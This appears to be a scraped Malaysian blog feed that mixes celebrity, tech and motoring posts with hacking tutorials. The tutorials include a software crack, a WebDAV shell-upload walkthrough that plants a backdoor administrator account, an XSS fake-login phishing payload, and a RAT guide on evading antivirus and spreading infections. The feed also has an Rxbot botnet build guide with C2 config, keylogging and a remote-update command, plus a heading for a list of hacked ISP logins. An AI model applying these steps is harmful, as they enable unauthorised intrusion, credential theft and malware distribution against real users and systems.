Ziana Zain Kini Bertudung

Sejak kebelakangan ini, penampilan penyanyi terkenal Ziana Zain telah menjadi tajuk perbincangan ramai selepas penyanyi ini dikatakan telah berhijab. Namun, Ziana sendiri tidak mengesahkan perkara ini sehinggalah pada 15 Julai lalu apabila dia mengakui tampil dengan imej bertudung. 

 

Memetik laporan portal hiburan Murai, Ziana menjelaskan penghijrahannya di bulan Ramadan ini adalah kurniaan yang amat besar dan berkat doa yang telah dimakbulkan Allah SWT.

 

“Ini adalah hadiah yang Allah SWT berikan kepada saya, sebuah ganjaran yang dijanjikan setelah tidak putus-putus doa daripada peminat, kawan-kawan dan yang paling termakbul adalah doa kedua ibu bapa saya.

 

“Allah SWT telah berikan apa yang mereka semua pohon, sementara itu juga dibukakan pintu hati saya menerima syariat agama ini. Setelah beberapa tahun saya memasang niat, akhirnya hari yang dinanti sudah tiba. Perasaan yang datang itu bukan rasa yang biasa tetapi kuasa yang luar biasa," ujar Ziana yang mengharapkan hijrahnya ini kekal ke akhir hayat.

 

Dalam pada itu, Ziana menjelaskan karier seninya akan berjalan seperti biasa namun akan lebih menjaga penampilannya dengan sebaik mungkin. Ziana juga terharu dengan sokongan daripada keluarga terutama anak-anak dan mengharapkan sokongan yang tidak berbelah bagi daripada peminatnya.

Read More

Augmented Reality Future: How to Train Your Dragons on Vacation

                                                                                                                                                                                                         Dragons Adventure World Explorer is just a taste of what is to come. It does have some conflict for boys and dragon husbandry for girls, but I would have preferred much more mayhem. It is an amazing step into the future of augmented reality and gaming, but I think we'll find what comes out of the imaginations of those who create games that follow it will be far more amazing.

   

Mcrosoft just announced the release of the Dragons Adventure World Explorer, or DAWE for short. It is actually very cool and well-timed, because for any of us who have tried to go on a long trip in a car, this should keep the little tykes engaged and quiet.

It also should get developers excited about creating more games that could turn the family vacation experience into a bloodbath of adventure for boys and a 4H-like experience for girls, but with dragons! I'll explain and then close with my product of the week: a service I just can't seem to live without.

Augmented Reality Promise

HP's augmented reality demonstration way back in 2007 captured the imagination and showcased where this technology eventually could go. Blending what was real with what was imaginary, the technology demonstration presented the promise of a game that got kids to play outside and had a reward that I think a lot of geeky kids would have bought the game to enjoy.

Since then, there has been more focus on creating things that will pop out of ads for movies, toys and food than in creating games that blend the real world outside with the imaginations of game developers. Microsoft's Dragons Adventure World Explorer is designed not only to be a game, but also a showcase to get developers' imaginations going and finally create the world that HP imagined the better part of a decade ago.

Dragons Adventure

Microsoft showed up at my house last week to give me a preview of the game, codeveloped with DreamWorks, and it is an impressive initial effort. What the game does is allow you to choose the dragon -- it is based on the successful How to Train Your Dragon DreamWorks movie series -- and then fly over and around your car, depicted on the map as a slow moving cart, to complete quests.

The structures around you are consistent with the game, and they pick up elements from a number of Internet mapping and location-based services to make it feel more real.

For instance, if you are passing a Starbucks, the game will reflect that but display the store as an ancient building consistent with the game timeline. As you move forward, the game around you changes in accordance with the real world, keeping the two connected. As you fly away from the car, more remote things that are captured by the geolocation services come into view. I could see one problem, in that kids noticing that there was a McDonald's or Baskin-Robbins nearby suddenly could become rather strident in their wish for a physical visit over a virtual one as their stomachs overrule their desire for game points and rewards. Connecting to the outside and showcasing what the player is missing it actually should pull kids out of the game to see the real thing, providing a never-ending stream of variety that should keep the focus on the game and not on irritating the driver on a long ride -- at least, that is the hope.

Wrapping Up: Moving Into the Augmented Reality Future

The Dragons Adventure is an amazing step into the future of augmented reality and gaming. It is just a step, though, and I think we'll find what comes out of the imaginations of those who create games that follow it will be far more amazing.

Still, it is a decent initial effort that reminds me of that old HP vision with the only downside being you don't get kissed by a princess at the end. Now if they could add that... my wife wouldn't let me play it anymore.

Read More

Redesign for barebones Raspberry Pi computer

The B+ can also power more peripherals without the need for a dedicated power source and has more connectors to help link it to other devices. The new model is released as the Pi faces increasing competition from other tiny computers. Power train The B+ is based on the same Broadcom chip as earlier versions and has the same 512 megabytes of memory but a variety of other changes have been made to the device. The analogue and composite video connector has been ditched in favour of a single four-pole connector and the SD card slot has been replaced with a micro-SD card unit. This has a latch on it to ensure the smaller card does not fall out. Better power management on the B+ will mean it can keep four USB peripherals going without requiring mains power or an external hub. "People expect to see four USB ports these days," said Mike Powell, a spokesman for electronics components firm Element 14 which sells the Pi. "With the Model B as soon as you had connected a keyboard and mouse that was it." More USB ports and better power management allowed owners to run a 2.5in (6.4cm) hard drive off the device without the need for a powered hub, said Mr Powell. The General Purpose I/O (GPIO) section of the device has also been expanded to 40 pins - 14 more than on the original machine. This, said Mr Powell would give people many more options to add work with extras such as sensors and relays. "When the Pi was first launched they really underestimated what people were going to do with it," he said.  

About three million Raspberry Pi computers have been sold around the world

In a review of the B+ in Linux Voice Ben Everard said one of the most significant improvements was the gadget's power management. An improved voltage regulator meant the device was much more stable when handling USB-connected peripherals. "To be able to handle lots more input and output means this is a significantly more useful computer," wrote Mr Everard, "and will be especially important for new users who may not have a great power supply or a powered USB hub." The B+ will be available via online electronics stores such as Element 14. About three million Raspberry Pi computers have been sold around the world. The Pi now faces much more competition from devices such as the Beaglebone Black, the Hummingboard, the APC 8750, the Android MK802 mini PC, Banana Pi and the Matrix TBS2910.

Read More

Harga Baru Lesen Kereta Dan Motor 14 Julai 2014

Harga Baru Lesen Kereta Dan Motor 14 Julai 2014. Seperti yang diketahui umum, harga lesen memandu untuk kereta iaitu kelas (D) dan lesen motor iaitu kelas (B2) akan dinaikkan bermula 14 Julai 2014. Kenaikkan harga lesen ini berikutan pelaksanaan Kurikulum Pendidikan Pemandu (KPP) yang dinaik taraf oleh JPJ mulai 14 Julai 2014. Pembaharuan dalam pengambilan kelas memandu ini merangkumi 3 elemen yang dinaiktaraf iaitu kelas KPP, buku teks KPP sukatan pembelajaran baharu, dan juga format ujian berkomputer. Berikut disenaraikan harga baru untuk lesen memandu kereta dan motor.

Harga Baru Lesen Kereta Dan Motor 14 Julai 2014

Mulai 14 Julai 2014 harga lesen memandu Kelas D dan Kelas B2 akan dinaikkan seperti berikut.

* Kereta Kelas D – RM 1300 akan naik ke RM 2000 * Motorsikal Kelas B2 – RM 600 (termasuk yuran lesen) akan naik ke RM 1050

Senarai Harga Baru Lesen Kelas D (Kereta Manual)

 

Senarai Harga Baru Lesen Kelas B2 (Motorsikal)

Read More

Gadis Peugeot CDM25 terlajak biadab

Assalamualaikum dan Salam 1Dunia, memang naik darah aku bila tengok seorang gadis yang menaiki kereta Peugeot dengan plate no CDM25 mengamuk macam kena histeria hanya kereta baru tercalar sedikit. Mungkin dia tak menyangka lagak samsengnya telah dirakam oleh seseorang dan menjadi trending di sosial media. Ramai lagi pemandu lain yang terlibat kemalangan yang lebih hebat dari ini tetapi tidak bertindak mengetuk-getuk kereta yang melanggar.

Aku sendiri ada pengalaman beberapa kali dilanggar dan melanggar kereta orang lain tapi tak lah nak mengamuk macam ini. Tak percaya baca kisah aku langgar kereta seseorang di entri “Malang tidak berbau“. Kita ada tuhan bila berlaku sesuatu mesti ada sebabnya. Paling teruk peristiwa ini berlaku di bulan Ramadhan ketika umat Islam dikehendaki bersabar dengan ujian tapi gadis ini meroyan macam tak puasa.

Daripada siasatan yang di keluarkan oleh sebuah blog Asamboi.my kereta Peugeot CDM25di daftarkan atas nama syarikat Rangkaian Kerja Kahwin Sdn Bhd yang beralamat di Puchong.

Sumber dari : http://denaihati.com.my/gadis-peugeot-cdm25-terlajak-biadab

Read More

Tip & Trick Buat Duit Share Iklan Dengan ChurpChurp

Panas isu berkaitan penipuan klik iklan 8Share dan juga ChurpChurp ni, sebenarnya bukan dua platform ini sahaja yang dijadikan bahan, malah banyak lagi.

Cara Betul dan Tips Dapatkan Income Menerusi 8Share dan ChurpChurp
Yang panas dan menjadi isu adalah kerana cara yang dilakukan oleh pihak-pihak tertentu yang dianggap kurang telus dan memaksa. Boleh sahaja anda selitkan iklan-iklan tersebut asalkan jangan memperdaya atau menunjukkan bahawa kaedah itu seperti memaksa untuk klik. Ia seharusnya berlaku secara sukarela dan semulajadi.

Sebagai contoh, lihat perbedaan antara kedua ini:

Contoh 1: Join segmen ini dengan perlu klik iklan berikut: Klik Iklan 1, Klik Iklan 2

Contoh 2: Dah join segmen, meh lihat promo iklan ini: Jom Lihat Harga Kereta Proton Terbaru Suprima S dan Kontes oleh Digi Menang Hadiah Wang Tunai

Nampak tak perbezaan yang ada dalam dua cara di atas tersebut. Ini dinamakan telus, kerana anda memberitahu pengunjung, pembaca blog anda mengenai apa yang anda kongsikan. Jika mereka berminat, mereka akan klik dan berikan ganjaran 20 sen yang patut anda terima menerusi perkongsian informasi.

Cara 1, anda buta-buta suruh pembaca klik iklan tersebut tanpa fikir samada mereka mahu atau tidak mahu lihat, sebaliknya dengan cara 2 … anda dah beritahu awal-awal apa yang bakal mereka akan lihat.

Tatacara di atas sama terpakai apabila anda kongsikan iklan tersebut di laman sosial seperti Facebook mahupun Twitter.

Buat Duit Free Churp Churp

Read More

Internet Download Manager 6.18 build 12 Latest Version Crack is Here !

Latest IDM Version : Internet Download Manager 6.18  build 12 (Released: Jan 16, 2014)

Latest Crack Version : V15

Internet Download Manager - 6.18  build 12

Internet Download Manager aka IDM developers released the latest version of  their well-known Download Accelerator ; Internet Download Manager  few days ago.The new version contains Resolved compatibility issues with Google Chrome 32,Fixed bugs and many more acceleration improvements.There are only few working cracks can be found on the internet.

Normal Cracks work but only for few days.IDM says back that the given serial number is a fake one !!.So On HAX developed a special version of IDM crack that let you reset your IDM crack status again and re-crack it to full version.It is not complex as it seems, all you have to do is just clicking few buttons.You can simply trust on On HAX IDM crack because it has a history of more than 1 year with regular updates,and also it has more than 1,000,000 worldwide downloads.

Screenshots

Downloads

Internet Download Manager 6.18 build 12 latest official setup (5.6 MB)

IDM 6.18 build 12 Setup + Crack.rar (7.75MB) / Mirrors

IDM Crack V15 Only.rar (2.2 MB) / Mirrors

IDM 6.18 b12 Manual method activator.rar (1.34MB)  / Mirrors - for windows xp users

How to Crack?

1. Install IDM 6.18 build 12 (above 6.12 can be cracked)
2. Close all the open IDM windows
3. Download and Extract Crack
4. Now Run IDM Crack.exe
5. Select IDM installation folder ( ex : C:\Program Files \Internet Download Manager )
6. Click Activate button.It will say that IDM activated successfully !
7. IDM will launch itself from few seconds (Close and Run IDM again if it says it ran as administrator)
8. Yeah !! it’s cracked already

IDM says it’s a fake serial number ?This happens when you have used some other cracks or serial keys before.To fix

1. install IObit Unisntaller and uninstall IDM completely. Get IObit Uninstaller Here
2. IObit uninstaller will let you delete all the files created by IDM from powerful scan.delete all the files
3. Re-install IDM.
4. Then use the downloaded crack and activate

Manual Method ( recommended for windows xp users )

1. Download IDM manual method activation.rar
2. Close all the open IDM windows
3. Copy and replace the IDMan.exe & IDMGrHlp.exe in the IDM installation folder with the files given in downloaded crack
4. Run register.reg file in downloaded folder
5. Launch IDM
6. Done ! Activated

Malware/Virus risk

Many virus guards say that this crack is a virus or some other kind of unwanted program. We can do nothing about that.All we can do is giving a guaranty that On HAX do not issue any crack or a program that can harm your computer or your privacy ( we really don’t  got anything to do with your private data  ).But if you are still not mature enough to handle the risk, just purchase the full version of IDM from their purchase page !

If you have any problems on this,comment below.We’ll try to reply as soon as possible !!
Cheers !! ratings are always welcome 

Read More

All Hack is here (Hack WebDAV & Deface)

Alright guy's today in this tutorial I'll be explaining how to use the webdav exploit. The link for the tools used for this tutorial can be found in the bottom of this tutorial. For those of you who do not know what a Webdav is here is the definition.

Web-based Distributed Authoring and Versioning, or WebDAV, is a set of extensions to the Hypertext Transfer Protocol (HTTP) that allows computer-users to edit and manage files collaboratively on remote World Wide Web servers.

But fo our purpose we will be using it to exploit RDP's or the Remote Desktop Protocal. For a better understanding of these with RDP's they could range from Vp's to Dedi's to just plain old home Pc's, but no matter what it is you will gain full access to the machine and can basically do whatever you want using a shell. For those of you who are new to the hacking scene a shell is a php script that allows you to view all of the files on the server you decide to host the shell on. The most common shells are the c99 or the r57, but in this case we will be using the c99. Now please be aware these are not the only shells available there are several posted throughout the forum and you can find them by simply using the search button located on the navbar. Now before being able to use the shell we have to find some vulnerable Ip's to gain access to for this we will be using the WebdavlinkCrawler which can be found in the webdav tools kit I have provided below here if you don't trust my download links simply don't download them it's that simple. Once you have managed to open the program you will be presented with this interface.

as you can see there is a Start, Stop, and Remove double. All of these terms will be explained later on, but what you are going to want to do is click the start button and it will being to search for the Ip's with webdav in them. Once you have managed to gather some ip's like you see in the picture here

Now please be aware this was only with about 15 seconds of searching and your results may differ depending on your connection speed as well as the amount of time you run the application. After you have all of your Ip's your going to want to click one so it's highlighted and the right click it you will be presented with a popup that looks like this

I have no idea what that actually means,(if someone would like to translate and tell me please feel free.) but what it is doing is copying all of the Ip's you have scanned. After you have scanned all of the Ip's your going to want to paste them in a new word document

once you have done so save it as something you can remember and put it in a convenient location. After you have saved your collected webdav Ip's in a word document your going to want to open the Ip Scanner in the folder. It will look like this

what your going to want to do is click the "Get Ip's" button and browse to your recently saved text file. After you have your ip's in place

your going to want to press the scan button what this is doing is now taking all of your Webdav Ip's and figuring out which one's are vulnerable to this particular exploit. The one's on the right are the ones it scanned and if you happen to get any in the middle those are the one's you can exploit. In my case this time I didn't happen to have any that were open to this exploit because I had a limited amount of Ip's. After you have managed to gather some ip's in the middle column and are ready to exploit the server you can just double check by going to the ip/webdav/ in your browser and Ip being one of the exploited ones you managed to get and your going to be looking for an index page that says Webdav Test page. After you have confirmed it is ready to go your going to want to open "map network drive" this can be found by either right clicking Network or my computer in the start menu.

what your going to want to click on is the hyperlink that reads " Connect to a website that you can use to store your document's and pictures. You will be presented with a screen all you have to do is click next. And the your going to want to click Choose a custom network location.

Now this is the important screen it should look like this

What you have to do is put the Ip/webdav in the text box and click next

you should then be prompted with a login box the default username is wampp and the default password is xampp. Once you have successfully connected you can now browse it's folder's so what you have to do now is just drag and drop the shell.php in side the main directory

After doing so go to ip/webdav/shell.php it should look like the following

Feel free to use that Ip if you are that much of a noob and cannot do anything for yourself. Once you are viewing your shell inside the execute textbox your going to want to do the following commands

net localgroup administrators SUPPORT /Add

What this is doing is making the remote desktop username SUPPORT and the password !password!. So now the last and final step is to open remote desktop and connect using the Ip and the login detail's we have just created. The shell is for you to explore and discover for yourself. Now you may be wondering What can you do once your in?

Answer : 1.You can do so much! Plant Rootkits/ Upload your RAT on the server:D
2. I upload my RAT’s incase they try to take back there dedi.
3. Host a web IRC bot or Shell Booter
4. Store files or host websites or shells
5. Make a Botnet!

TOOLS

http://dl.dropbox.com/u/18083172/Webdav%20tools.rar

How to Cross Site Scripting (XSS)

What is Cross Site Scripting?
Cross Site Scripting (or XSS) is one of the most common application-layer web attacks. XSS commonly targets scripts embedded in a page which are executed on the client-side (in the user’s web browser) rather than on the server-side. XSS in itself is a threat which is brought about by the internet security weaknesses of client-side scripting languages, with HTML and JavaScript (others being VBScript, ActiveX, HTML, or Flash) as the prime culprits for this exploit. The concept of XSS is to manipulate client-side scripts of a web application to execute in the manner desired by the malicious user. Such a manipulation can embed a script in a page which can be executed every time the page is loaded, or whenever an associated event is performed.
In a typical XSS attack the hacker infects a legitimate web page with his malicious client-side script. When a user visits this web page the script is downloaded to his browser and executed. There are many slight variations to this theme, however all XSS attacks follow this pattern, which is depicted in the diagram below.

A basic example of XSS is when a malicious user injects a script in a legitimate shopping site URL which in turn redirects a user to a fake but identical page. The malicious page would run a script to capture the cookie of the user browsing the shopping site, and that cookie gets sent to the malicious user who can now hijack the legitimate user’s session. Although no real hack has been performed against the shopping site, XSS has still exploited a scripting weakness in the page to snare a user and take command of his session. A trick which often is used to make malicious URLs less obvious is to have the XSS part of the URL encoded in HEX (or other encoding methods). This will look harmless to the user who recognizes the URL he is familiar with, and simply disregards and following ‘tricked’ code which would be encoded and therefore inconspicuous.

Site owners are always confident, but so are hackers!

Without going into complicated technical details, one must be aware of the various cases which have shown that XSS can have serious consequences when exploited on a vulnerable web application. Many site owners dismiss XSS on the grounds that it cannot be used to steal sensitive data from a back-end database. This is a common mistake because the consequences of XSS against a web application and its customers have been proven to be very serious, both in terms of application functionality and business operation. An online business project cannot afford to lose the trust of its present and future customers simply because nobody has ever stepped forward to prove that their site is really vulnerable to XSS exploits. Ironically, there are stories of site owners who have boldly claimed that XSS is not really a high-risk exploit. This has often resulted in a public challenge which hackers are always itching to accept, with the site owner having to later deal with a defaced application and public embarrassment.

The repercussions of XSS

Analysis of different cases which detail XSS exploits teaches us how the constantly changing web technology is nowhere close to making applications more secure. A thorough web search will reveal many stories of large-scale corporation web sites being hacked through XSS exploits, and the reports of such cases always show the same recurring consequences as being of the severe kind.

Exploited XSS is commonly used to achieve the following malicious results:

• Identity theft
• Accessing sensitive or restricted information
• Gaining free access to otherwise paid for content
• Spying on user’s web browsing habits
• Altering browser functionality
• Public defamation of an individual or corporation
• Web application defacement
• Denial of Service attacks

Any site owner with a healthy level of integrity would agree that none of the above can really be considered us frivolous or unimportant impacts on a vulnerable site. Security flaws in high-profile web sites have allowed hackers to obtain credit card details and user information which allowed them to perform transactions in their name. Legitimate users have been frequently tricked into clicking a link which redirects them to a malicious but legitimate-looking page which in turn captures all their details and sends them straight to the hacker. This example might not sound as bad as hacking into a corporate database; however it takes no effort to cause site visitors or customers to lose their trust in the application’s security which in turn can result in liability and loss of business.

XSS Attack Vectors

Internet applications today are not static HTML pages. They are dynamic and filled with ever changing content. Modern web pages pull data from many different sources. This data is amalgamated with your own web page and can contain simple text, or images, and can also contain HTML tags such as <p> for paragraph, <img> for image and <script> for scripts. Many times the hacker will use the ‘comments’ feature of your web page to insert a comment that contains a script. Every user who views that comment will download the script which will execute on his browser, causing undesirable behaviour. Something as simple as a Facebook post on your wall can contain a malicious script, which if not filtered by the Facebook servers will be injected into your Wall and execute on the browser of every person who visits your Facebook profile.

A practical example of XSS on an Acunetix test site.

The following example is not a hacking tutorial. It is just a basic way to demonstrate how XSS can be used to control and modify the functionality of a web page and to re-design the way the page processes its output. The practical use of the example may be freely debated; however anyone may see the regular reports which describe how advanced XSS is used to achieve very complex results, most commonly without being noticed by the user. I encourage also those individuals with no hacking knowledge to try the following example, I am sure you will find it interesting.

1. Load the following link in your browser: http://testasp.vulnweb.com/search.asp, you will notice that the page is a simple page with an input field for running a search

2. Try to insert the following code into the search field, and notice how a login form will be displayed on the page:

Please login with the form below before proceeding: <br><br>Please login with the form below before proceeding:

<form action="destination.asp"><table><tr><td>Login:</td><td><input type=text length=20 name=login></td></tr><tr><td>Password:</td><td><input type=text length=20 name=password></td></tr></table><input type=submit value=LOGIN></form>

then simply hit the search button after inserting the code.

Through the XSS flaw on the page, it has been possible to create a FAKE login form which can convince gather a user’s credentials. As seen in step 2, the code contains a section which mentions “destination.asp”. That is where a hacker can decide where the FAKE login form will send the user’s log-in details for them to be retrieved and used maliciously.

A hacker can also inject this code by passing it around via the browser’s address bar as follows:

http://testasp.vulnweb.com/Search.asp?tfSearch=%3Cbr%3E%3Cbr%3EPlease+login+with+the+form+below+before+proceeding%3A%3C form+action%3D%22test.asp%22%3E%3Ctable%3E%3Ctr%3E%3Ctd%3ELogin%3A%3C%2Ftd%3E%3Ctd%3E%3Cinput+type%3Dtext+ length%3D20+name%3Dlogin%3E%3C%2Ftd%3E%3C%2Ftr%3E%3Ctr%3E%3Ctd%3EPassword%3A%3C%2Ftd%3E%3Ctd%3E%3Cinput +type%3Dtext+length%3D20+name%3Dpassword%3E%3C%2Ftd%3E%3C%2Ftr%3E%3C%2Ftable%3E%3Cinput+type%3Dsubmit+value %3DLOGIN%3E%3C%2Fform%3E

This will create the same result on the page, showing how XSS can be used in several different ways to achieve the same result. After the hacker retrieves the user’s log-in credentials, he can easily cause the browser to display the search page as it was originally and the user would not even realize that he has just been fooled. This example may also be seen in use in all those spam emails we all receive. It is very common to find an email in your inbox saying how a certain auctioning site suspects that another individual is using your account maliciously, and it then asks you to click a link to validate your identity. This is a similar method which directs the unsuspecting user to a FAKE version of the auctioning site, and captures the user’s log-in credentials to then send them to the hacker.

Why wait to be hacked?

The observation which can be made when new stories of the latest hacks are published is that the sites which belong to the large brands and corporations are hacked in exactly the same way as those sites owned by businesses on a much smaller budget. This clearly shows how lack of security is not a matter of resources, but it is directly dependant on the lack of awareness among businesses of all size. Statistically, 42% of web applications which request security audits are vulnerable to XSS, which is clearly the most recurring high-risk exploit among all the applications tested. The effort to raise awareness about how easy it is for an expert hacker to exploit a vulnerable application does not seem to be going too far. It is still very common to see the “We’ll see when I get hacked” mentality still lingering among site owners who finally risk losing a lot of money and also the trust of their customers. Anybody with the interest to research this matter will see how even individuals claiming to be security experts feel comfortable to state that XSS is over-rated and cannot really be used to achieve serious results on a web application. However further research will also prove that statistical figures speak for themselves, and those same statistics keep growing at a rate which will eventually overcast the claims of those incredulous “experts”.

Remote Administration Tool (RAT) Guide

Whats RAT?
A RAT is also a shortcut called Remote Administrator Tool. It is mostly used for malicious purposes, such as controlling PC’s, stealing victims data, deleting or editing some files. You can only infect someone by sending him file called Server and they need to click it.


How they work?
Some RATs can spread over P2P file sharing programs(uTorrent, Pirate Bay etc.), Messangers spams(MSN, Skype, AIM etc.).

Download?

Well you can find any type of RAT here, on sprawd-tutor.blogspot.com. To download.  and you will find some links. Also, you can buy FUD private version of RAT: Albertino RAT, Medusa Rat, jRAT etc. Also you will need DNS host for your RAT.


How do I control server?
Once installed, RAT server can be controlled via RAT client. From IP list box you choose PC and connect.


What do I need to setup RAT?
Well, you will need Windows OS, open port & RAT. To forward your port scroll for tutorial link or click this URL.

How do I port forward?
Port forwarding is easy and important for RAT. Well, you need open port because RAT connects through open port and bypass firewall. Open your web browser and write your IP and connect to your rooter(write Username: Admin & Password: Admin), open port forward page and write port you want and your IP. Well that’s all you need to do and now you got open port.


How do I make my server FUD?
If you want to make your server FUD again, you will need crypter(you can find free FUD one here.). Also, you can hex edit your server, but be careful some servers can crash after hex editing, any way check out this cool tutorial How to make FUD with hex editing.


How do I remove server if I infect myself?
When you infect yourself, first what you going to do is to connect to your PC. Some RATs have function to uninstall servers, well you click that and you uninstall it. Well there is another way, download MalwareBytes’ Anti-Malware and scan whole computer for Trojan.


Legal or illegal?
Well some RATs are legal, and some are not. Legal are the one without backdoor left, and they have abillity to close connection anytime. Illegal are used for hacking and they can steal data(Credit Cards, Passwords, private data etc.).




Legal :

TeamViewer – Access any remote computer via Internet just like sitting in front of it – even through firewalls.
UltraVNC – Remote support software for on demand remote computer support. VNC.Specializing in Remote Computer Support, goto my pc, goto assist, Remote Maintenance
Ammyy Admin – Ammyy Admin is a highly reliable and very friendly tool for remote computer access. You can provide remote assistance, remote administration or remote
Mikogo – Mikogo is an Online Meeting, Web Conferencing & Remote Support tool where you can share your screen with 10 participants in real-time over the Web.

 Illegal :

Spy-Net
Cerberus Rat
CyberGate Rat
SubSeven
Turkojan
ProRat

Download RAT : 

Where and how do I spread?
There are few different ways to spread your server. You can spread on warez websites, P2P file sharing websites(uTorrent, Pirate bay etc.), YouTube etc. Well some people use custom made Auto-Spreaders programs to spread their server. But best and most effective way to spread is when you FUD your server.


Whats DNS host?
The Domain Name System (DNS) is a hierarchical naming system for computers, services, or any resource connected to the Internet or a private network. It associates various information with domain names assigned to each of the participants. Most importantly, it translates domain names meaningful to humans into the numerical (binary) identifiers associated with networking equipment for the purpose of locating and addressing these devices worldwide.


What can RAT do?

• Manage files
• Control web browser(Change homepage, open site etc.)
• Get system informations(OS Version, AV name, Ram Memory, Computer name etc.)
• Get passwords, credit card numbers or private data etc.
• View and remote control desktop
• Record camera & sound
• Control mouse
• Delete, rename, download, upload or move files

What’s reverse Connection? 
A reverse connection is usually used to bypass firewall restrictions on open ports. The most common way a reverse connection is used is to bypass firewall and Router security restrictions.


Whats direct connection?
A direct-connect RAT is a simple setup where the client connects to a single or multiple servers directly. Stable servers are multi-threaded, allowing for multiple clients to be connected, along with increased reliability.


Can I get traced when I rat somebody?
Yes and no. Depends on victim, it is really hard to remove infection or even trace a hacker. There are tools like WireShark, but it’s really hard to trace, because PC usually got over 300 connections. So don’t worry.


Direct connection:

[Client]
|    [Client]
|      /
|     /
|    /
|   /
[Server]-----[Client]

How To Create And Compile Botnets To Autohack 1000ds of Systems

In addition to Rxbot 7.6 modded in this tutorial, you can also use another good source. It is rx-asn-2-re-worked v3 is a stable mod of rxbot and it is 100% functional and not crippled. If you want to download it, you can below:

Download

Compiling is the same as it would be with Rxbot 7.6. I prefer this source but it would ultimately be best to compile your own bot/get a private one.

What is a botnet?

A botnet is where you send a trojan to someone and when they open it a "bot" joins your channel on IRC(secretly, they don't know this)Once done the computer is now refered to as a "zombie".

Depending on the source you used, the bot can do several things.

I myself have helped write one of the most advanced and secure bot sources out there.

(Off topic)

But once again depending on the source you can :

Keylog their computer, take picutes of their screen, turn on their webcam and take pics/movies, harvest cdkeys and game keys or even cracks, passwords, aim screen names, emails, you can also spam, flood, DDoS, ping, packet, yada yada, some have built in md5 crackers, and clone functions to spamm other irc channels and overrun a channel and even perform IRC "Takeovers".

Once again depending on the bot it may be able to kill other fellow competeter bots.

Or even kill AV/FW apon startup.

Add itself to registry.

Open sites.

Open commands.

Cmd,

notepad,

html,

Anything is possible !

Theres the infected computers "bots" the attacker, the server, and the victim.

while the term "botnet" can be used to refer to any group of bots, such as IRC bots, the word is generally used to refer to a collection of compromised machines running programs, usually referred to as worms, Trojan horses, or backdoors, under a common command and control infrastructure. A botnet's originator (aka "bot herder") can control the group remotely, usually through a means such as IRC, and usually for nefarious purposes. Individual programs manifest as IRC "bots". Often the command and control takes place via an IRC server or a specific channel on a public IRC network. A bot typically runs hidden, and complies with the RFC 1459 (IRC) standard. Generally, the perpetrator of the botnet has compromised a series of systems using various tools (exploits, buffer overflows, as well as others; see also RPC). Newer bots can automatically scan their environment and propagate themselves using vulnerabilities and weak passwords. Generally, the more vulnerabilities a bot can scan and propagate through, the more valuable it becomes to a botnet controller community.
Suspects in the case used the Randex worm to establish a 30,000 strong botnet used to carry out "low profile DDoS attacks" and steal the CD keys for games, he explained. "They had a huge weapon and didn't use as much as they could have done," Santorelli told El Reg. "The main damage caused in the case is down to the cost of cleaning up infected PCs."

Botnets are being used for Google Adword click fraud, according to security watchers.

Now enough with all the quotes. As you can see, you can do anything with a botnet. Anything is possible. This is my bot and tutorial. You can host your bots on irc on a public server but I would recommend a private, password protected server. I will setup bots for people if they have something to offer.
---------------
Ignore anything about using the server editor but this tutorial show how to make an irc channel and spread bots:
Download tutorial


Here we go ladies and gentlemen
Follow the tutorial:

1. Setting up the C++ compilier : easy
Download : Microsoft Visual C++ 6.0 Standard Edition (63.4 mb)
Server 2
Server 3 (Direct Download)

Serial Key : 

812-2224558

Password : 

itzforblitz

2. Run setup.exe and install. Remember to input serial
3. Download and install the Service Pack 6 (60.8 mb)
4. After that Download and install: Windows SDK (1.2 mb)
Server 2
Server 3 (Direct Download)

Password : 

2. Configuring the C++ compilier (easy)

1. Open up Microsoft Visual C++ Compilier 6.0
2. Go to Tools > Options and Click the "Directories" tab
3. Now, browse to these directories and add them to the list: (Click the dotted box to add)
Quote:
C:\PROGRAM FILES\MICROSOFT PLATFORM SDK
C:\PROGRAM FILES\MICROSOFT PLATFORM SDK\BIN
C:\PROGRAM FILES\MICROSOFT PLATFORM SDK\INCLUDE
C:\PROGRAM FILES\MICROSOFRT PLATFORM SDK\LIB

4. Now put them in this order: (use up and down arrows)

3. Configuring your bot: (easy)

1. Download and unpack:

Rxbot 7.6 (212.3 kb)

Server 2

Server 3 (Direct Download)

2. You should see an Rxbot 7.6 folder

3. Open the Rxbot 7.6 > configs.h folder and edit these lines only:

char password[] = "Bot_login_pass"; // bot password (Ex: monkey)
char server[] = "aenigma.gotd.org"; // server (Ex: irc.efnet.net)
char serverpass[] = ""; // server password (not usually needed)
char channel[] = "#botz_channel"; // channel that the bot should join
char chanpass[] = "My_channel_pass"; // channel password

Optional:

char server2[] = ""; // backup server
char channel2[] = ""; // backup channel
char chanpass2[] = ""; //Backup channel pass

4. Building your bot: (very easy)

1. Make sure Microsoft Visual C++ is open
2. Select "File > Open Workspace"
3. Browse to your Rxbot 7.6 folder and open the rBot.dsw file
4. Right Click "rBot Files" and click Build:

5. rBot.exe will be in the Rxbot 7.6 > Debug folder !!!

YOUR DONE !!!! Now get the rbot and pack it (Use tool in third post and open rbot and click "Protect" and send it to some idiots, Follow tutorial on top to learn how to spread. Some good ways are: Torrents, AIM, Friends, Myspace, School computers, and P2P but there are more ways. ENJOY !

Command List :
Download Command List


Basics:

.login botpassword will login bots
.logout will logout bots
.keylog on will turn keylogger on
.getcdkeys will retrieve cdkeys.
Read command list for more

Download mIRC :
mIRC
Server 2
Server 3 (FTP)

How to secure your bots:

Don't be an ~censored~, it is easy to steal bots. All you need is the irc server address and maybe a key.
To steal bots, watch for the @login key one must upload their bot to a direct link (tdotnetwork is execellent)
and update the channel topic and run:

@update http://www.mybot.com/download/SMSPRO.exe 82

The http://mybot.com is your bot's download link and the 82 can be any number(s)

Now steal their bots and have them join your channel
To find the server address you need their botnet. Then take their bot and open it in the server editor. Address will be shown and so will password and other needed information.


To secure your self:

It is fairly easy to secure your bots, here is how:

1. When you are in your right click on your chat window and select "Channel Modes"
2. Make sure these options are checked:

This way no one besides you or another op can set the channel topic 

Note: Setting "Moderated" is good for when you are not there because anyone who is not voiced (+v) or and op (+o) cannot talk. They will still log in and follow commands however there will be no output.

Good IRC Servers:

I would recommend running your botnet on a private server. 

If you would like to setup a botnet on a certain server, do not intrude and make one. Talk to the admin and make sure he know that the IRC server is not doing anything illegal. If an Admin refuses, don't get angry. It is his/her server after all

[LIST] Hacked Streamyx Username / Password [LIST]

List 1 : 

List 2 

SQL Injection [Manual]

First of all: What is SQL injection?


